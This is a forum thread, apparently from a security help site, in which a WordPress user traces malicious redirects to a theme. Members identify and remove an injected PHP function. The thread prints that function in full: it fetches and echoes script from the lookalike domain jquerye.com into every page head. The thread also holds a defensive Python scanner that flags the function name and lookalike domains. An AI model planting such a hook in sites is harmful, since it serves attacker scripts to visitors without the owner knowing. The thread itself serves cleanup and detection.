[Solved]

Hello,
I just started a new website a few weeks ago, using WordPress + the goodnews 3.4 theme. But yesterday when I clicked on a post “something” redirected me to this strange website: downloadmusicfreenow.com.
I can't figure out what can be infected… Please help me fix this.

Thank you!

Hi geryeo,

Can you provide the specific post you were on? Use hXtp:// instead of http://.

~!Donovan

Hi geryeo,

Wait for !Donovan to sort this out, but consider these WOT web rep results: http://www.mywot.com/en/scorecard/downloadmusicfreenow.com?utm_source=addon&utm_content=popup-donuts The site is given as a malvertiser, so that is likely what will be turned up…
For your site I get a WordPress alert Web application version:
WordPress version: WordPress
Wordpress Version 3.3 or 3.4 based on: htxp://danongonline.net/wp-includes/js/autosave.js
WordPress theme: htxp://danongonline.net/wp-content/themes/goodnews34/
Wordpress internal path: /home/ducvan/public_html/danongonline.net/wp-content/themes/goodnews34/index.php
There could be a code issue here:
s.gravatar.com/js/gprofiles.js?aa&ver=3.4.1 benign
[nothing detected] (script) s.gravatar.com/js/gprofiles.js?aa&ver=3.4.1
status: (referer=danongonline.net/)saved 23917 bytes 54d6e2713dbe666dfb1c9339d1550616c2204807
info: [img] s.gravatar.com/js/
info: [decodingLevel=0] found JavaScript
suspicious:
For further website security issues, see: http://net.saferpage.de/danongonline

polonus

@Donovan Sorry, I don’t remember that post…

But I found in the theme folder …/post.php this part of code which looks very strange: … jquerye.com/jquery-1.6.3.min.js
Shouldn’t there be jquery.com?

Is there any good malware scanner site where I can upload the theme (I think the problem is there) and check it?

Thanks

Yes geryeo, that is malcode. !Donovan reported a similar case in another thread… jqueries was used there (plural); apparently they are variations on the same injected malcode theme.

polonus

Ok, so now I just need to delete that part with …jquerye.com/jquery-1.6.3.min.js… to solve it?

Thanks polonus

Hi geryeo,

You are welcome. Here is what the Sucuri Blog had on this: http://blog.sucuri.net/2012/07/fake-jquery-website-serving-redirection-malware.html
blog article author = dre armeda

polonus

Just to leave this as a reference for all who have a similar problem:

The code that I had in my WordPress website was inside the theme folder in a file called functions.init.php and it looked like this:

if (!function_exists('insert_jquery_slider')) {
    function insert_jquery_slider ()
    {
        if (function_exists('curl_init')) {
            $url = "http://www.jquerye.com/jquery-1.6.3.min.js";
            $ch = curl_init();
            $timeout = 5;
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
            $data = curl_exec($ch);
            curl_close($ch);
            echo $data;
        }
    }
    add_action('wp_head', 'insert_jquery_slider');
}

If you ever happen to be in the same place, this is how to solve this:

Just search in all your files by text and look for “jquerye” or even better for “insert_jquery_slider” or any of the patterns you see in the piece of code above. That should point you where you need to go! (hint: just remove the whole function)
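
The file search described in the post above, as an added example that is not part of the original thread: a Python script that walks a theme folder, flags the `insert_jquery_slider` name, and also flags any hard-coded URL whose domain is a near-miss of a domain the site really uses. The `TRUSTED` list, the 0.7 similarity threshold and the sample text are assumptions made for this sketch.

```python
import re, sys
from difflib import SequenceMatcher
from pathlib import Path
from urllib.parse import urlparse

# Assumption: domains this site really loads scripts from; edit for your site.
TRUSTED = ("jquery.com", "gravatar.com", "googleapis.com")
MARKERS = ("insert_jquery_slider",)  # function name from the post above
URL_RE = re.compile(r"""https?://[^\s'"<>)]+""", re.I)

def lookalike_of(host):
    """Return the trusted domain that host imitates, or None."""
    parts = host.lower().rstrip(".").split(".")
    if len(parts) < 2 or ".".join(parts[-2:]) in TRUSTED:
        return None
    for trusted in TRUSTED:
        brand = trusted.split(".")[0]
        # 0.7 is a tunable assumption: close to a trusted name, but not equal.
        if SequenceMatcher(None, parts[-2], brand).ratio() >= 0.7:
            return trusted
    return None

def scan_text(text):
    """Return a list of (line number, kind, detail) for one file's contents."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        findings += [(n, "marker", m) for m in MARKERS if m in line]
        for url in URL_RE.findall(line):
            try:
                host = urlparse(url).hostname or ""
            except ValueError:  # malformed URL text, nothing to compare
                continue
            near = lookalike_of(host)
            if near:
                findings.append((n, "lookalike", f"{host} ~ {near}"))
    return findings

def scan_tree(root):
    """Scan every .php file under root; return {path: findings}."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = scan_text(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report

# Constructed sample, condensed from the snippet posted above.
SAMPLE = """<?php
function insert_jquery_slider () {
    $url = "http://www.jquerye.com/jquery-1.6.3.min.js";
}
add_action('wp_head', 'insert_jquery_slider');
$ok = "http://code.jquery.com/jquery-1.6.3.min.js";
"""

if __name__ == "__main__":
    result = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else {"SAMPLE": scan_text(SAMPLE)}
    for name, hits in result.items():
        for n, kind, detail in hits:
            print(f"{name}:{n}: {kind}: {detail}")
```

Run it with the path to `wp-content/themes/` as the only argument; with no argument it scans the embedded sample.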

Hi RamyNasr,

We thank you very much for the solutions you found. Glad we could help to arrive there. Stay safe and secure,

polonus

Hi, I don’t know if I’m a little late to post in here regarding this issue. I am having the same problem. I am trying to edit

<?php if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){if (function_exists('curl_init')){$url = "http://www.jquery.com";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_slider');} ?>

I just don’t know what part to take out exactly. One person mentioned removing the function; I just need to know exactly what part of the code is the function, as I am totally new to this stuff… I have tried taking certain parts of it out, and I just mess things up. Any help will be greatly appreciated! Thank you in advance.

Everything that you posted is part of the function. Did you try removing the whole line?

Also: The code you provide says jquery.com, not jquerye.com. Is there any specific reason why you want to remove this?

~!Donovan